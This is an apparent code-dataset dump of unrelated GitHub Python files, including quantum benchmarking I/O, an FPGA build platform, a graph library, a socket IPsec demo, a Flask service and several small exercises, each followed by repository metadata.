f.write('samplerargs ' + str(rbspec._samplerargs) + '\\n')\n\n specdict = spec.to_dict()\n del specdict['circuits'] # Don't write the circuits to this file.\n\n with open(filename, 'w') as f:\n _json.dump(specdict, f, indent=4)\n\n\ndef import_rb_summary_data(filename, numqubits, datatype='auto', verbosity=1):\n \"\"\"\n todo\n\n \"\"\"\n try:\n with open(filename, 'r') as f:\n if verbosity > 0: print(\"Importing \" + filename + \"...\", end='')\n except:\n raise ValueError(\"Date import failed! File does not exist or the format is incorrect.\")\n\n aux = []\n descriptor = ''\n # Work out the type of data we're importing\n with open(filename, 'r') as f:\n for line in f:\n\n if (len(line) == 0 or line[0] != '#'): break\n\n elif line.startswith(\"# \"):\n descriptor += line[2:]\n\n elif line.startswith(\"## \"):\n\n line = line.strip('\\n')\n line = line.split(' ')\n del line[0]\n\n if line[0:2] == ['rblength', 'success_probabilities']:\n\n auxind = 2\n if datatype == 'auto':\n datatype = 'success_probabilities'\n else:\n assert(datatype == 'success_probabilities'), \"The data format appears to be \" + \\\n \"success probabilities!\"\n\n elif line[0:3] == ['rblength', 'success_counts', 'total_counts']:\n\n auxind = 3\n if datatype == 'auto':\n datatype = 'success_counts'\n else:\n assert(datatype == 'success_counts'), \"The data format appears to be success counts!\"\n\n elif line[0: numqubits + 2] == ['rblength', ] + ['hd{}c'.format(i) for i in range(numqubits + 1)]:\n\n auxind = numqubits + 2\n if datatype == 'auto':\n datatype = 'hamming_distance_counts'\n else:\n assert(datatype == 'hamming_distance_counts'), \"The data format appears to be Hamming \" + \\\n \"distance counts!\"\n\n elif line[0: numqubits + 2] == ['rblength', ] + ['hd{}p'.format(i) for i in range(numqubits + 1)]:\n\n auxind = numqubits + 2\n if datatype == 'auto':\n datatype = 'hamming_distance_probabilities'\n else:\n assert(datatype == 'hamming_distance_probabilities'), \"The data format appears to be \" + \\\n \"Hamming distance probabilities!\"\n\n else:\n raise ValueError(\"Invalid file format!\")\n\n if len(line) > auxind:\n assert(line[auxind] == '#')\n if len(line) > auxind + 1:\n auxlabels = line[auxind + 1:]\n else:\n auxlabels = []\n\n break\n\n # Prepare an aux dict to hold any auxillary data\n aux = {key: {} for key in auxlabels}\n\n # Read in the data, using a different parser depending on the data type.\n if datatype == 'success_counts':\n\n success_counts = {}\n total_counts = {}\n finitecounts = True\n hamming_distance_counts = None\n\n with open(filename, 'r') as f:\n for line in f:\n if (len(line) > 0 and line[0] != '#'):\n\n line = line.strip('\\n')\n line = line.split(' ')\n l = int(line[0])\n\n if l not in success_counts:\n success_counts[l] = []\n total_counts[l] = []\n for key in auxlabels:\n aux[key][l] = []\n\n success_counts[l].append(float(line[1]))\n total_counts[l].append(float(line[2]))\n\n if len(aux) > 0:\n assert(line[3] == '#'), \"Auxillary data must be divided from the core data!\"\n for i, key in enumerate(auxlabels):\n if key != 'target' and key != 'circuit':\n aux[key][l].append(_ast.literal_eval(line[4 + i]))\n else:\n if key == 'target':\n aux[key][l].append(line[4 + i])\n if key == 'circuit':\n aux[key][l].append(_cir.Circuit(line[4 + i]))\n\n elif datatype == 'success_probabilities':\n\n success_counts = {}\n total_counts = None\n finitecounts = False\n hamming_distance_counts = None\n\n with open(filename, 'r') as f:\n for line in f:\n if (len(line) > 0 and line[0] != '#'):\n\n 
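# Each data row has the form: <rblength> <success_probability> [# <aux fields...>]\n                        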
line = line.strip('\\n')\n line = line.split(' ')\n l = int(line[0])\n\n if l not in success_counts:\n success_counts[l] = []\n for key in auxlabels:\n aux[key][l] = []\n\n success_counts[l].append(float(line[1]))\n\n if len(aux) > 0:\n assert(line[2] == '#'), \"Auxillary data must be divided from the core data!\"\n for i, key in enumerate(auxlabels):\n if key != 'target' and key != 'circuit':\n aux[key][l].append(_ast.literal_eval(line[3 + i]))\n else:\n if key == 'target':\n aux[key][l].append(line[3 + i])\n if key == 'circuit':\n aux[key][l].append(_cir.Circuit(line[3 + i]))\n\n elif datatype == 'hamming_distance_counts' or datatype == 'hamming_distance_probabilities':\n\n hamming_distance_counts = {}\n success_counts = None\n total_counts = None\n\n if datatype == 'hamming_distance_counts': finitecounts = True\n if datatype == 'hamming_distance_probabilities': finitecounts = False\n\n with open(filename, 'r') as f:\n for line in f:\n if (len(line) > 0 and line[0] != '#'):\n\n line = line.strip('\\n')\n line = line.split(' ')\n l = int(line[0])\n\n if l not in hamming_distance_counts:\n hamming_distance_counts[l] = []\n for key in auxlabels:\n aux[key][l] = []\n\n hamming_distance_counts[l].append([float(line[1 + i]) for i in range(0, numqubits + 1)])\n\n if len(aux) > 0:\n assert(line[numqubits + 2] == '#'), \"Auxillary data must be divided from the core data!\"\n for i, key in enumerate(auxlabels):\n if key != 'target' and key != 'circuit':\n aux[key][l].append(_ast.literal_eval(line[numqubits + 3 + i]))\n else:\n if key == 'target':\n aux[key][l].append(line[numqubits + 3 + i])\n if key == 'circuit':\n aux[key][l].append(line[numqubits + 3 + i])\n #aux[key][l].append(_cir.Circuit(line[numqubits + 3 + i]))\n else:\n raise ValueError(\"The data format couldn't be extracted from the file!\")\n\n rbdataset = _dataset.RBSummaryDataset(numqubits, success_counts=success_counts, total_counts=total_counts,\n hamming_distance_counts=hamming_distance_counts, aux=aux,\n finitecounts=finitecounts, descriptor=descriptor)\n\n if verbosity > 0:\n print('complete')\n\n return rbdataset\n\n\ndef write_rb_summary_data_to_file(ds, filename):\n \"\"\"\n todo\n\n \"\"\"\n numqubits = ds.num_qubits\n with open(filename, 'w') as f:\n\n descriptor_string = ds.descriptor.split(\"\\n\")\n\n for s in descriptor_string:\n if len(s) > 0:\n f.write(\"# \" + s + \"\\n\")\n\n if ds.datatype == 'success_counts':\n if ds.finitecounts:\n topline = '## rblength success_counts total_counts'\n else:\n topline = '## rblength success_probabilities'\n\n elif ds.datatype == 'hamming_distance_counts':\n if ds.finitecounts:\n topline = '## rblength' + ''.join([' hd{}c'.format(i) for i in range(0, numqubits + 1)])\n else:\n topline = '## rblength' + ''.join([' hd{}p'.format(i) for i in range(0, numqubits + 1)])\n\n auxlabels = list(ds.aux.keys())\n if len(auxlabels) > 0:\n topline += ' #'\n for key in auxlabels: topline += ' ' + key\n\n f.write(topline + '\\n')\n\n for l, counts in ds.counts.items():\n\n for i, c in enumerate(counts):\n\n if ds.datatype == 'success_counts':\n if ds.finitecounts:\n dataline = str(l) + ' ' + str(c) + ' ' + str(ds._total_counts[l][i])\n else:\n dataline = str(l) + ' ' + str(c)\n elif ds.datatype == 'hamming_distance_counts':\n dataline = str(l) + ''.join([' ' + str(c[i]) for i in range(0, numqubits + 1)])\n\n if len(auxlabels) > 0:\n dataline += ' #' + ''.join([' ' + str(ds.aux[key][l][i]) for key in auxlabels])\n\n f.write(dataline + '\\n')\n\n return\n\n\n# # todo update this.\n# def 
import_rb_summary_data(filenames, numqubits, type='auto', verbosity=1):\n# \"\"\"\n# todo : redo\n# Reads in one or more text files of summary RB data into a RBSummaryDataset object. This format\n# is appropriate for using the RB analysis functions. The datafile(s) should have one of the\n# following two formats:\n\n# Format 1 (`is_counts_data` is True):\n\n# # The number of qubits\n# The number of qubits (this line is optional if `num_qubits` is specified)\n# # RB length // Success counts // Total counts // Circuit depth // Circuit two-qubit gate count\n# Between 3 and 5 columns of data (the last two columns are expected only if `contains_circuit_data` is True).\n\n# Format 2 (`is_counts_data` is False):\n\n# # The number of qubits\n# The number of qubits (this line is optional if `num_qubits` is specified)\n# # RB length // Survival probabilities // Circuit depth // Circuit two-qubit gate count\n# Between 2 and 4 columns of data (the last two columns are expected only if `contains_circuit_data` is True).\n\n# Parameters\n# ----------\n# filenames : str or list.\n# The filename, or a list of filenams, where the data is stored. The data from all files is read\n# into a *single* dataset, so normally it should all be data for a single RB experiment.\n\n# is_counts_data : bool, optional\n# Whether the data to be read contains success counts data (True) or survival probability data (False).\n\n# contains_circuit_data : bool, optional.\n# Whether the data counts summary circuit data.\n\n# finitesampling : bool, optional\n# Records in the RBSummaryDataset whether the survival probability for each circuit was obtained\n# from finite sampling of the outcome probabilities. This is there to, by default, warn the user\n# that any finite sampling cannot be taken into account if the input is not counts data (when\n# they run any analysis on the data). But it is useful to be able to set this to False for simulated\n# data obtained from perfect outcome sampling.\n\n# num_qubits : int, optional.\n# The number of qubits the data is for. 
Must be specified if this isn't in the input file.\n\n# total_counts : int, optional\n# If the data is success probability data, the total counts can optional be input here.\n\n# verbosity : int, optional\n# The amount of print-to-screen.\n\n# Returns\n# -------\n# None\n# \"\"\"\n\n\n# # todo : update this.\n# def write_rb_summary_data_to_file(RBSdataset, filename):\n# \"\"\"\n# Writes an RBSSummaryDataset to file, in the format that can be read back in by\n# import_rb_summary_data().\n\n# Parameters\n# ----------\n# RBSdataset : RBSummaryDataset\n# The data to write to file.\n\n# filename : str\n# The filename where the dataset should be written.\n\n# Returns\n# -------\n# None\n# \"\"\"\n","repo_name":"pyGSTio/pyGSTi","sub_path":"pygsti/extras/rb/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":33215,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"62"} +{"seq_id":"28108745054","text":"from migen.build.generic_platform import GenericPlatform\nfrom migen.build.altera import common, quartus\n\n\nclass AlteraPlatform(GenericPlatform):\n bitstream_ext = \".sof\"\n create_rbf = True\n\n def __init__(self, *args, toolchain=\"quartus\", **kwargs):\n GenericPlatform.__init__(self, *args, **kwargs)\n if toolchain == \"quartus\":\n self.toolchain = quartus.AlteraQuartusToolchain()\n else:\n raise ValueError(\"Unknown toolchain\")\n\n def get_verilog(self, *args, special_overrides=dict(), **kwargs):\n so = dict(common.altera_special_overrides)\n so.update(special_overrides)\n return GenericPlatform.get_verilog(self, *args, special_overrides=so,\n **kwargs)\n\n def build(self, *args, **kwargs):\n return self.toolchain.build(self, *args, **kwargs)\n\n def add_period_constraint(self, clk, period):\n if hasattr(clk, \"p\"):\n clk = clk.p\n self.toolchain.add_period_constraint(self, clk, period)\n","repo_name":"m-labs/migen","sub_path":"migen/build/altera/platform.py","file_name":"platform.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":1114,"dataset":"github-code","pt":"62"} +{"seq_id":"9596509283","text":"import unittest\n\nfrom src.agents.RandomAgent import RandomAgent\nfrom src.envs.two_player_briscola.BriscolaConstants import Constants\nfrom src.envs.two_player_briscola.TwoPlayerBriscola import TwoPlayerBriscola\nfrom src.utils.training_utils import play_all_moves_of_player, play_all_moves_of_players\nfrom src.vectorizers.VectorizedEnv import VectorizedEnv\n\n\nclass TestTrainUtils(unittest.TestCase):\n def test_play_all_moves_of_player(self):\n vec_env = VectorizedEnv(lambda: TwoPlayerBriscola(), 128)\n n_actions = vec_env.single_action_space().n\n player_policy = RandomAgent(n_actions)\n vec_env.reset()\n for _ in range(Constants.deck_cards // (2 * Constants.n_agents) + 1):\n play_all_moves_of_player(vec_env.get_envs(), player_policy, \"player_0\")\n [self.assertEqual(agent, \"player_1\") for agent in vec_env.agent_selections()]\n play_all_moves_of_player(vec_env.get_envs(), player_policy, \"player_1\")\n [self.assertEqual(agent, \"player_0\") for agent in vec_env.agent_selections()]\n\n def test_play_all_moves_of_players(self):\n vec_env = VectorizedEnv(lambda: TwoPlayerBriscola(), 271)\n n_actions = vec_env.single_action_space().n\n player_policies = [RandomAgent(n_actions)] * 19\n vec_env.reset()\n for _ in range(Constants.deck_cards // (2 * Constants.n_agents) + 1):\n play_all_moves_of_players(vec_env.get_envs(), player_policies, \"player_0\")\n [self.assertEqual(agent, 
\"player_1\") for agent in vec_env.agent_selections()]\n play_all_moves_of_players(vec_env.get_envs(), player_policies, \"player_1\")\n [self.assertEqual(agent, \"player_0\") for agent in vec_env.agent_selections()]\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"LetteraUnica/BriscolaBot","sub_path":"test/utils/test_train_utils.py","file_name":"test_train_utils.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"62"} +{"seq_id":"30660740059","text":"import signal\nimport time\nfrom flask import Flask\nfrom loguru import logger\n\napp = Flask(__name__)\n\nterminated = False\n\n\n@app.route('/', methods=['GET'])\ndef index():\n time.sleep(0.1)\n return 'Hello world 2\\n'\n\n\n@app.route('/ready')\ndef status():\n logger.info(f'readiness probe with status: {\"terminated\" if terminated else \"healthy\"}')\n if not terminated:\n return 'OK', 200\n else:\n return 'NotReady', 500\n\n\ndef signal_handler(signum, frame):\n global terminated\n logger.info(f'Handling signal {signum}')\n terminated = True\n\n\nif __name__ == '__main__':\n signal.signal(signal.SIGTERM, signal_handler)\n signal.signal(signal.SIGINT, signal_handler)\n app.run(debug=True, port=8080, host='0.0.0.0')\n","repo_name":"alonitac/DevOpsMay22","sub_path":"13_zero_downtime_flask_k8s/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"62"} +{"seq_id":"8885929809","text":"class Node:\r\n def __init__(self, string):\r\n self.label = string\r\n\r\n\r\nclass Graph:\r\n def __init__(self):\r\n super().__init__()\r\n self.vertices = {}\r\n self.adjacencyList = {}\r\n\r\n def addNode(self, label):\r\n node = Node(label)\r\n if label not in self.vertices:\r\n self.vertices[label] = node\r\n if label not in self.adjacencyList:\r\n self.adjacencyList[node ] = []\r\n\r\n def removeNode(self, label):\r\n if label not in self.vertices:\r\n return\r\n self.vertices.pop(label)\r\n self.__removeAdjacency(label)\r\n self.__removeAdjEdge(label)\r\n\r\n def addEdge(self, start, end):\r\n start = self.vertices.get(start)\r\n end = self.vertices.get(end)\r\n self.adjacencyList.get(start).append(end)\r\n\r\n def removeEdge(self, start, end):\r\n start, end = self.__removeNodeValues(start, end)\r\n if end in self.adjacencyList.get(start):\r\n self.adjacencyList.get(start).remove(end)\r\n\r\n def depthTransverse(self, node):\r\n transversed = []\r\n self.__depthTransverse(transversed, node)\r\n return transversed\r\n\r\n def breadthTransverse(self, node):\r\n queue = [node]\r\n transversed = []\r\n self.__breadthTransverse(queue, transversed)\r\n return transversed\r\n\r\n def topologicalSort(self):\r\n stack = []\r\n if not self.hasCycle():\r\n self.__topologicalSort(stack, self.__getTopologyKey())\r\n else:\r\n return \"Graph have Cycle. 
So a topological sort can't be performed\"\r\n return self.__popStack(stack)\r\n\r\n def hasCycle(self):\r\n cycle = False\r\n for key in self.adjacencyList.keys():\r\n visited = []\r\n cycle = self.__checkCycle(visited, key, cycle)\r\n if cycle:\r\n break\r\n return cycle\r\n\r\n def display(self):\r\n for key in self.adjacencyList.keys():\r\n print(f'{key.label} connected to {self.__getEdges(key)}')\r\n\r\n def __getEdges(self, key):\r\n connections = []\r\n for node in self.adjacencyList.get(key):\r\n connections.append(node.label)\r\n return connections\r\n\r\n def __removeAdjacency(self, label):\r\n for node in self.adjacencyList.keys():\r\n if node.label == label:\r\n remove_node = node\r\n self.adjacencyList.pop(remove_node)\r\n\r\n def __removeAdjEdge(self, label):\r\n for key in self.vertices.keys():\r\n self.removeEdge(key, label)\r\n\r\n def __removeNodeValues(self, start, end):\r\n for node in self.adjacencyList.keys():\r\n if node.label == start:\r\n start = node\r\n for node in self.adjacencyList.get(start):\r\n if node.label == end:\r\n end = node\r\n return start, end\r\n\r\n def __depthTransverse(self, transversed, node):\r\n if node in transversed:\r\n return\r\n if node is None:\r\n return\r\n transversed.append(node)\r\n for key in self.adjacencyList.keys():\r\n if key.label == node:\r\n node = key\r\n if self.adjacencyList.get(node) is not None:\r\n for obj in self.adjacencyList.get(node):\r\n self.__depthTransverse(transversed, obj.label)\r\n\r\n def __breadthTransverse(self, queue, transversed):\r\n if len(queue) > 0:\r\n if queue[0] not in transversed:\r\n transversed.append(queue[0])\r\n for key in self.adjacencyList.keys():\r\n if key.label == queue[0]:\r\n nodes = key\r\n if self.adjacencyList.get(nodes) is not None:\r\n for node in self.adjacencyList.get(nodes):\r\n queue.append(node.label)\r\n queue.pop(0)\r\n self.__breadthTransverse(queue, transversed)\r\n\r\n def __topologicalSort(self, stack, key):\r\n if key is None:\r\n return\r\n if key.label not in stack:\r\n for node in self.adjacencyList.get(key):\r\n self.__topologicalSort(stack, node)\r\n if key.label not in stack:\r\n stack.append(key.label)\r\n\r\n def __getTopologyKey(self):\r\n for key in self.adjacencyList.keys():\r\n return key\r\n\r\n def __popStack(self, stack):\r\n topological_sort = ''\r\n for i in range(len(stack)-1, -1, -1):\r\n topological_sort += stack[i]\r\n return topological_sort\r\n\r\n def __checkCycle(self, visited, key, cycle) -> bool:\r\n # depth-first search; copy the current path per branch so sibling branches\r\n # don't see each other's nodes, and check every neighbor, not just the first\r\n visited = visited + [key.label]\r\n for node in self.adjacencyList.get(key):\r\n if node.label in visited:\r\n return True\r\n if self.__checkCycle(visited, node, cycle):\r\n return True\r\n return False\r\n\r\n\r\n\r\ngraph = Graph()\r\ngraph.addNode('x')\r\ngraph.addNode('a')\r\ngraph.addNode('b')\r\ngraph.addNode('p')\r\ngraph.addEdge('x', 'a')\r\ngraph.addEdge('x', 'b')\r\ngraph.addEdge('a', 'p')\r\ngraph.addEdge('b', 'p')\r\ngraph.addEdge('p', 'x')\r\ngraph.display()\r\n#print(f'Depth Transverse : {graph.depthTransverse(\"a\")}')\r\n#print(f'Breadth Transverse : {graph.breadthTransverse(\"a\")}')\r\nprint(graph.topologicalSort())","repo_name":"zeeshan-akram/Data-Structures-and-Algorithms-Python","sub_path":"Graph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":5251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"38372262518","text":"from ast import Bytes\nimport socket\nimport pickle\nimport os\nimport sys\nfrom threading import 
Thread\nimport time\nfrom IpSec import IKE2, IpSec, Messeng\nimport pyDH\nclass Server():\n #ownIpAdress = \"127.0.1.1\"\n \n #ownIpAdress = \"192.168.1.2\"\n localPort = 80\n bufferSize = 2048\n serverStatus = True\n msgBuffor = None\n def __init__(self,ownIpAdress, quote,netMonitor):\n self.ownIpAdress = ownIpAdress\n self.quote=quote\n self.netMonitor=netMonitor\n\n \n def start(self):\n self.ownIpAdress = \"127.0.1.1\" \n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((self.ownIpAdress, self.localPort))\n s.listen(1)\n while (True and self.serverStatus == True):\n conn, addr = s.accept()\n \n #print ('Connection address:', addr)\n data = conn.recv(self.bufferSize)\n conn.close()\n if not data: break\n data = pickle.loads(data)\n self.netMonitor.put(\"Server received message \" + str(data))\n\n if data[0] == 0 :\n odczyatana = data\n odczyatana[1] = IpSec.fromBytes(data[1])\n self.quote.put(Messeng(odczyatana,str(addr[0]),str(self.ownIpAdress)))\n #self.quote.put(data)\n #print (\"received data:\", data)\n\n \n if data[0] == 1 :\n print (\"received data:\", data[1], flush=True)\n self.quote.put(Messeng(data,str(addr[0]),str(self.ownIpAdress)))\n d = pyDH.DiffieHellman()\n dh = d.gen_public_key()\n self.quote.put(Messeng([2,dh],str(addr[0]),str(self.ownIpAdress)))\n #conn.send(pickle.dumps('repo')) # echo\n \n \n \n\n if data[0] == 2 :\n print (\"received data:\", data[1], flush=True)\n self.quote.put(Messeng(data,str(addr[0]),str(self.ownIpAdress)))\n \n \n \n \n def stop(self):\n self.serverStatus = False\n\n\n\nclass Client():\n def sendMesseng(dstIp,data,netMonitor):\n #dstIp = \"127.0.1.1\"\n dstIP = \"127.0.1.1\"\n TCP_PORT = 80\n BUFFER_SIZE = 1024\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((dstIp, TCP_PORT))\n print(\"inside Client, sending \", data, flush=True)\n netMonitor.put(\"Client sending message \" + str(data))\n s.send(pickle.dumps(data))\n #data = s.recv(BUFFER_SIZE)\n s.close()\n # print (\"received data:\", data)\n\n\n#List of message types sent by the Client [type, data]:\n #0 - Message\n #1 - Public key, forcing a key exchange \n #2 - Public key sent as a reply\n\n\n","repo_name":"LukaszCzerniszewski/Demonstrator-IPsec","sub_path":"communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"11011091518","text":"import pika\nimport json\nimport os\nimport sys\nimport time\nfrom pymongo import MongoClient\nimport flask\nimport pprint\nimport uuid\nimport traceback\nimport redis\n\nredisConnection = None\nwhile redisConnection is None:\n time.sleep(1)\n try:\n redisConnection = redis.StrictRedis(host='redis', port=6379, db=0)\n except:\n print(\"Error in connection to redis\")\n sys.stderr.flush()\n sys.stdout.flush()\n\nmongoConnection = None\nwhile mongoConnection is None:\n time.sleep(1)\n try:\n mongoConnection = MongoClient('mongo', 27017)\n except:\n print(\"Error in connection to mongo\")\n sys.stdout.flush()\n\n\n\n\napp = flask.Flask(__name__)\n\ndef publishTasksToRabbit(taskId, carIdsList):\n rabbitConnection = pika.BlockingConnection(pika.ConnectionParameters(host='rabbitmq'))\n\n channel = rabbitConnection.channel()\n channel.queue_declare(queue='report_queue', durable=True)\n for carId in carIdsList:\n taskToPublish = {\"taskId\": taskId, \"id\" : carId}\n channel.basic_publish(exchange='',\n routing_key='report_queue',\n body=json.dumps(taskToPublish),\n 
properties=pika.BasicProperties(\n delivery_mode = 2, # make message persistent\n ))\n rabbitConnection.close()\n\n@app.route('/report-group-distance/<groupId>')\ndef reportDistance(groupId):\n global mongoConnection\n global redisConnection\n\n\n UUID = str(uuid.uuid4())\n\n idsList = list(mongoConnection.cars.incoming.find({\"group\": int(groupId)}).distinct(\"id\"))\n\n print(idsList)\n sys.stdout.flush()\n\n redisConnection.set(UUID, len(idsList))\n publishTasksToRabbit(taskId=UUID, carIdsList=idsList)\n\n while int(redisConnection.get(UUID)) > 0:\n time.sleep(0.1)\n\n redisConnection.delete(UUID)\n toReturn = redisConnection.get(UUID+\"_result\")\n redisConnection.delete(UUID+\"_result\")\n return str(toReturn)\n\napp.run(host='0.0.0.0', port=80, threaded = True)\n","repo_name":"jakubbujny/docker-workshops","sub_path":"report_service/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"72215984836","text":"from random import randint\r\nimport csv\r\n\r\n#import math\r\n#import copy\r\n\r\n\r\nmainmenu = [\"1:Add a new item \", \"2:Move an item\", \"3:search an item\",\r\n \"4:view the inventory of a warehouse\", \"0: exit the system\"]\r\n\r\nwarehouseA = []\r\nwarehouseATV = 0\r\n\r\n\r\n\r\ndef addNewItem():\r\n \r\n global warehouseA\r\n global warehouseATV\r\n loadFile()\r\n itemId = input(\"Please give the ID\")\r\n description = input(\"Please give the name or description:\")\r\n value = input(\"Please give the value\")\r\n warehouse = input(\"Please give the warehouse name\")\r\n\r\n if warehouse == 'A':\r\n \r\n warehouseA.append([itemId, description, value])\r\n # otherwise do something else\r\n warehouseATV += int(value)\r\n \r\n for i in warehouseA:\r\n print(i)\r\n \r\ndef menu():\r\n\r\n # display a main menu\r\n for i in mainmenu:\r\n print(i)\r\n\r\n # get the choice from the keyboard\r\n c = input(\"please choose a number or press any other key to return:\")\r\n if c == '1':\r\n addNewItem()\r\n elif c == '0':\r\n exit(0)\r\n else:\r\n menu()\r\n \r\n\r\ndef loadFile():\r\n \r\n global warehouseATV\r\n global warehouseA\r\n with open(\"DADSA Assignment 2018-19 Warehouse A.csv\") as f:\r\n f.readline()\r\n\r\n csv_reader = csv.reader(f)\r\n #Iterate through the file\r\n for line in csv_reader:\r\n #print(line)\r\n warehouseA.append(line)\r\n warehouseATV = warehouseATV + int(line[2])\r\n\r\nmenu()\r\n\r\nprint(\"TOTAL VALUE OF WAREHOUSEA IS \" , warehouseATV)\r\nprint(warehouseA)\r\n#gui beginning\r\n#from tkinter import *\r\n#root = Tk()\r\n#thelabel = Label(root, text=\"WELCOME\")\r\n#theLabel.pack()\r\n#root.mainloop()","repo_name":"david-georgiev/trial","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"72326191877","text":"def count_swaps(sorted_list, num_list):\n swaps = 0\n\n position_map = {}\n for index, num in enumerate(num_list):\n position_map[num] = index\n\n for index, num in enumerate(num_list):\n if num != sorted_list[index]:\n swaps += 1\n pos = position_map[sorted_list[index]]\n # IMPORTANT: update indices within position_map\n position_map[num_list[index]] = pos\n position_map[num_list[pos]] = index\n # swap values as well\n num_list[index], num_list[pos] = num_list[pos], num_list[index]\n\n return swaps\n\n\n
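# For intuition, a worked trace of the function above: count_swaps([3, 7, 12, 15], [7, 15, 12, 3])\n# performs two swaps, [7, 15, 12, 3] -> [3, 15, 12, 7] -> [3, 7, 12, 15], and returns 2.\n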
def lilysHomework(arr):\n arr_copy = list(arr)\n\n sorted_list_asc = sorted(arr, reverse=False)\n sorted_list_dsc = sorted(arr_copy, reverse=True)\n\n swaps_a = count_swaps(sorted_list_asc, arr)\n swaps_d = count_swaps(sorted_list_dsc, arr_copy)\n\n return min(swaps_a, swaps_d)\n\n\n# pseudo code:\n# 1. Create a copy of the array\n# 2. Sort the array in ascending order\n# 3. Sort the copy of the array in descending order\n# 4. Count the number of swaps needed to sort the array in ascending order\n# 5. Count the number of swaps needed to sort the copy of the array in descending order\n\n# overall equation for running time:\n# T = O(n log n)\n\n\nif __name__ == '__main__':\n arr = [7, 15, 12, 3]\n arr2 = [3, 4, 1]\n arr3 = [2, 5, 3, 1, 9, 6, 7, 8, 4]\n\n print(lilysHomework(arr))\n print(lilysHomework(arr2))\n print(lilysHomework(arr3))\n","repo_name":"Lekipising/glowing-palm-tree","sub_path":"q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"1355831644","text":"import requests\nimport time\n\nurl = 'http://104.248.58.163:8200'\n\nchallenge = requests.get('{}/challenge'.format(url)).text.split(',')\n\ncache = dict()\n\ndecoded = '' \ntotal_start = time.time()\nprint(\"Decoding {} letters\".format(len(challenge)))\nfor i in challenge:\n start_time = time.time()\n if i not in cache:\n answer = requests.get('{}/decode'.format(url),params={'value':i}).text\n cache[i] = answer\n else:\n answer = cache[i]\n decoded += answer\n end_time = time.time()\n\nprint(decoded)\ntotal_end = time.time()\n\nprint(\"Took a total of {} seconds\".format(int(total_end - total_start)))","repo_name":"opbro/use_a_cache_challenge","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"36250850583","text":"import CoffeeMachineMenus as menu\n\n\ndef validate_flavor_info(machine):\n # Emojis used\n hungry = '\\U0001f60b'\n cup_coffee = '\\u2615'\n ingredients = '\\U0001f374'\n pencil = '\\u2712\\ufe0f'\n\n # Flavors created\n flavors_created = [name.name for name in machine.flavors]\n print(f\"{pencil} WRITING THE RECIPE {pencil}\")\n while True:\n name = input(f\"{cup_coffee} What is the drink's name: \").strip().title()\n if name in flavors_created:\n print(\"A flavor with this name already exists! Try another name\")\n continue\n else:\n break\n\n print(f\"{ingredients} ENTER THE RIGHT INGREDIENTS FOR THE {name}\")\n water = menu.validate_number(f\"{menu.water} How much water (ml) goes in: \")\n milk = menu.validate_number(f\"{menu.milk} How much milk (ml) goes in: \")\n coffee = menu.validate_number(f\"{cup_coffee} How much coffee (g) goes in: \")\n cost = menu.validate_number(f\"{menu.coin} How much {name} will cost: $ \")\n flavor = Flavor(name, {'Water': water, 'Milk': milk, 'Coffee': coffee}, cost)\n print(f\"{menu.assistant}: Hmmm, I wonder what this is gonna taste like! 
{hungry}\\n{'-' * 50}\")\n machine.flavors.append(flavor)\n\n\nclass Flavor:\n def __init__(self, name, ingredients, cost):\n \"\"\"\n Starts a new flavor of Coffee, with the given: Ingredients - Name - Cost\n \"\"\"\n self._name = name\n self._ingredients = ingredients\n self._cost = cost\n\n @property\n def name(self):\n return self._name\n\n @property\n def ingredients(self):\n return self._ingredients\n\n @property\n def cost(self):\n return self._cost\n\n @name.setter\n def name(self, new_name):\n self._name = new_name\n\n def set_cost(self):\n new_value = menu.validate_number(\"Enter the new value: $ \")\n self._cost = new_value\n\n def __str__(self):\n return f\"{self.__class__.__name__} --> {' | '.join([f'{k}: {v}' for k,v in self.__dict__.items()])}\"\n","repo_name":"victrralvss/100-Days-of-Code-Python","sub_path":"BEGINNER-SECTION/CoffeeMachine/Flavors.py","file_name":"Flavors.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"38527798227","text":"###Check whether cluster 0 should be dropped for any of these\n\nimport pandas as pd\nfrom Systematic_postprocessing_formulation import *\n\n#Set file to display all columns of pandas dataframe when print statement is called\npd.set_option('display.max_columns', None)\n\n#-------------- Load and analyze output of K-means/IP algorithm ------------#\n\n#Load original dataset to extract block names\nfile = \"../Data/MP_Final_Predictions_with_GPS_coordinates.xlsx\"\ndf = pd.read_excel(file)\n\n#Compile algorithm output and stats from block level runs into one dataset\ncluster_results_original, cluster_stats_original, dist_stats_original, OOSC_stats_original, cluster_centers_original = compile_original_results(original_df = df)\n\n#Analyze results of algorithm\nEG_districts = EG_subset(df)\nanalyze_output(EG_districts_ = EG_districts, cluster_stats_ = cluster_stats_original, dist_stats_ = dist_stats_original)\nstats_figures(dist_stats_ = dist_stats_original, cluster_stats_ = cluster_stats_original, postprocessing_stage = 0)\n\n#Generate map for results - Use jupyter notebook\n\n#------------- Postprocessing Stage 1 --------------------#\n'''\nDissolve clusters with 